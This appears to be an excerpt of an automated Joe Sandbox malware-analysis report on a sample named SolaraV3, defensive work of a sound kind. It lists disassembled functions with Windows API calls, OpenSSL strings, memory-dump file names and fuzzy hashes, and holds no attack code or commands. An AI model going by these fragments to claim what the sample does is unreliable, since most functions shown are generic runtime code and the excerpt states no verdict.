Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: EnvironmentVariable$ByteCharMultiWide
String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
API String ID: 2184640988-1666712896
Opcode ID: 6ae7bf8170fe4eb4311700b15542d8ceb35a2668fc38af68052a7f4661d56c96
Instruction ID: 2e0ddf5dcf605b0d2827ddc5107c71d794f4fcb8a9c1189d3736fcbc79c83a62
Opcode Fuzzy Hash: 6ae7bf8170fe4eb4311700b15542d8ceb35a2668fc38af68052a7f4661d56c96
Instruction Fuzzy Hash: 3261B6A6608B8296EB148F36D450A7967A1FF55BA8B48C231DE6F837F4DF3DE0058300

Function 00007FF6DC7083C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC70842B
RemoveDirectoryW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084AE
DeleteFileW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084CD
FindNextFileW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084DB
FindClose.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084EC
RemoveDirectoryW.KERNEL32(?,00007FF6DC708919,00007FF6DC703F9D), ref: 00007FF6DC7084F5

Strings

%s\*, xrefs: 00007FF6DC7083F2

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: 398dc6730260bb16ff4ede751416c0e23ca2e6ce85e6efacb00cf5f107a4fce0
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: B2417F21A0CA4A85EA709F61A4541FE6370FB94794F400333E6AEC26C4EF3DE567D701

Function 00007FFB0B81322E Relevance: 12.3, APIs: 8, Instructions: 251fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFB0B9B56EF
GetLastError.KERNEL32 ref: 00007FFB0B9B56FC
MultiByteToWideChar.KERNEL32 ref: 00007FFB0B9B5723
MultiByteToWideChar.KERNEL32 ref: 00007FFB0B9B5778
00007FFB2AD9F020.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFB0B9B5789
FindFirstFileW.KERNEL32 ref: 00007FFB0B9B58FC
FindNextFileW.KERNEL32 ref: 00007FFB0B9B5939
WideCharToMultiByte.KERNEL32 ref: 00007FFB0B9B5997

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
String ID:
API String ID: 1171239525-0
Opcode ID: 2d14182a43d6b154a267ad0b98e55e0737c9bb517ed9d516c0e43a6e55635043
Instruction ID: 74c7e4752448a59a0fedf0f993d03936fc4969b8d55e846c1897abd2a5444920
Opcode Fuzzy Hash: 2d14182a43d6b154a267ad0b98e55e0737c9bb517ed9d516c0e43a6e55635043
Instruction Fuzzy Hash: 89B1A0A6A15B8286EB208F35D564F7967A4FB58BA4F45C235DA5E837B4EF3CE0418300

Function 00007FFB0B815A24 Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFB0BA575CC
RtlCaptureContext.KERNEL32 ref: 00007FFB0BA575F9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFB0BA57613
RtlVirtualUnwind.KERNEL32 ref: 00007FFB0BA57654
IsDebuggerPresent.KERNEL32 ref: 00007FFB0BA576A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFB0BA576C9
UnhandledExceptionFilter.KERNEL32 ref: 00007FFB0BA576D4

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: fd064582dca017b65f84a5af08fa13e40438419c70a5fa8198f5f7a8a5acb07e
Instruction ID: 46ed98d7a926912660f8cd2772e9cd3c2db521832ee200310aa250e282d529c0
Opcode Fuzzy Hash: fd064582dca017b65f84a5af08fa13e40438419c70a5fa8198f5f7a8a5acb07e
Instruction Fuzzy Hash: C13132B6619B818AEB608F70E850BEE7364FB94744F448439DB4E97BA4DF38D648C710

Function 00007FF6DC70D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6DC70D148
RtlCaptureContext.KERNEL32 ref: 00007FF6DC70D175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6DC70D18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF6DC70D1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF6DC70D224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC70D241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC70D24C

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: 564a769d78f6f7348ade173c874a946f8c09c260890834bf171ae7ab098c6bab
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: F9313E72608B858AEB708F61E8903EE73B4FB94744F44403ADA4E87B99DF38D559C710

Function 00007FF6DC725C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6DC725C45

Part of subcall function 00007FF6DC725598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255AC

Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

Part of subcall function 00007FF6DC71A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6DC71A8DF,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71A909
Part of subcall function 00007FF6DC71A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6DC71A8DF,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71A92E

_get_daylight.LIBCMT ref: 00007FF6DC725C34

Part of subcall function 00007FF6DC7255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72560C

_get_daylight.LIBCMT ref: 00007FF6DC725EAA
_get_daylight.LIBCMT ref: 00007FF6DC725EBB
_get_daylight.LIBCMT ref: 00007FF6DC725ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DC72610C), ref: 00007FF6DC725EF3

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction ID: 740a22a3d9c5a59e482d2a3243f6d1f5ee3c22f031c12653f13af1f0ca93a048
Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction Fuzzy Hash: AED1C126E0824A46E770DF26D8A15BDA762FF84798F448137EA0DC7695EF3CE4638740

Function 00007FF6DC71A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF6DC71A68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6DC71A6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF6DC71A6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF6DC71A719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC71A723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6DC71A72E

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 0d71608eff498561538785c27ceb292077e6ce3557bc13c01e4d7a663ebd33b6
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: AA319336A08F858ADB60CF25E8502AE73B4FB88754F544136EA9D83B95DF3CD166CB00

Function 00007FF6DC721874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7218C0
FindFirstFileExW.KERNEL32 ref: 00007FF6DC7219CA

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction ID: b1c804c7149906916c15a875c6f53f7623fee7dba1f9656606373445430616db
Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction Fuzzy Hash: 6DB1F622B1869A42EA719B2695201BDA7A0FB44BE4F545133EE4D87BD5DE3CE863C300

Function 00007FF6DC725E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6DC725EAA

Part of subcall function 00007FF6DC7255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72560C

_get_daylight.LIBCMT ref: 00007FF6DC725EBB

Part of subcall function 00007FF6DC725598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255AC

_get_daylight.LIBCMT ref: 00007FF6DC725ECC

Part of subcall function 00007FF6DC7255C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7255DC

Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DC72610C), ref: 00007FF6DC725EF3

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction ID: 2e999d5bedbcb71b993dd2b8a3e3d47e016d192ce6285883294a4ee3d5cdc706
Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction Fuzzy Hash: BC519F32A0864A86E770DF26D8A15BDB761FB88798F408137EA4DC7695DF3CE4628740

Function 00007FFB0C351DD4 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 449COMMON

Download Yara Rule

APIs

00007FFB2ADB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFB0C3948A7

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFB0C3945CF, 00007FFB0C39478F, 00007FFB0C394A2C, 00007FFB0C394CAF
D:\a\1\s\ssl\packet_local.h, xrefs: 00007FFB0C39469F, 00007FFB0C3946B3

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\ssl\packet_local.h
API String ID: 3568877910-2178723975
Opcode ID: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
Instruction ID: 7fe8375ca30de59918be7b13ca642af096787647a5aa44324fb4c82b5f816873
Opcode Fuzzy Hash: c0126a933966b586eb01444f1caf48306036ef3bd94800007dc601cda98a503f
Instruction Fuzzy Hash: 1C128EF2A2868285E7609B75E448FAE77A0FF85B84F044135EE8D57A89DF7CE541CB00

Function 00007FFB0B812B62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FFB0B8DA3D9
WSAGetLastError.WS2_32 ref: 00007FFB0B8DA3E8

Strings

..\s\crypto\bio\b_sock2.c, xrefs: 00007FFB0B8DA38E, 00007FFB0B8DA3FE, 00007FFB0B8DA41A

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ErrorLastbind
String ID: ..\s\crypto\bio\b_sock2.c
API String ID: 2328862993-3200932406
Opcode ID: f4eba0e76321d527428058d812512f7d5c496053af6b33bf15f3205fea0f7f21
Instruction ID: f49a7a674b5fd58a86479a2b03e6b33543724e4dd25dfd61c7c6dad71e0c324b
Opcode Fuzzy Hash: f4eba0e76321d527428058d812512f7d5c496053af6b33bf15f3205fea0f7f21
Instruction Fuzzy Hash: F921B0B1B0820286E750DB31E801AAD6364FB80784F408531EB5E87BB9DF3CE5458B00

Function 00007FFB0B814246 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
